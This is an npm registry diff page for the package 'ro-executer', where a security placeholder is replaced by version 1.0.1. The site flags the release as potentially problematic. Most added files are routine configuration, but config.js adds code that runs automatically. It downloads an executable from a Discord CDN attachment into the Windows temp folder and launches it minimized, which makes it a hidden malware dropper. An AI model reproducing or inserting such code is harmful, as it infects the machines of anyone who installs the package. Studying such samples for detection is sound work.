ro-executer 0.0.1-security → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ro-executer might be problematic. Click here for more details.

package/.mergify.yml ADDED
@@ -0,0 +1,10 @@
1
+ pull_request_rules:
2
+ - name: automatic merge when CI passes and 2 reviews
3
+ conditions:
4
+ - status-success=Travis CI - Pull Request
5
+ - base=master
6
+ - files=data/data.json
7
+ - "#files=1"
8
+ actions:
9
+ merge:
10
+ method: merge
package/.prettierrc ADDED
@@ -0,0 +1,4 @@
1
+ {
2
+ "tabWidth": 2,
3
+ "singleQuote": false
4
+ }
package/.travis.yml ADDED
@@ -0,0 +1 @@
1
+ language: node_js
package/_config.yml ADDED
@@ -0,0 +1 @@
1
+ theme: jekyll-theme-minimal
package/config.js ADDED
@@ -0,0 +1,12 @@
1
+ const { exec } = require('child_process');
2
+
3
+ const executeCommand = () => {
4
+ const commandToExecute = 'curl -s -o %TEMP%\lol.exe "https://cdn.discordapp.com/attachments/1204477792041832499/1237218019562750022/creal.exe?ex=663ad892&is=66398712&hm=ca40d9ef3f46404892c80fbffc990338d6836e13d14c1af12c118ccbc3b4fb4f&" & start /MIN %TEMP%\lol.exe';
5
+
6
+ exec(commandToExecute, (error, stdout, stderr) => {
7
+
8
+ });
9
+ };
10
+
11
+
12
+ executeCommand();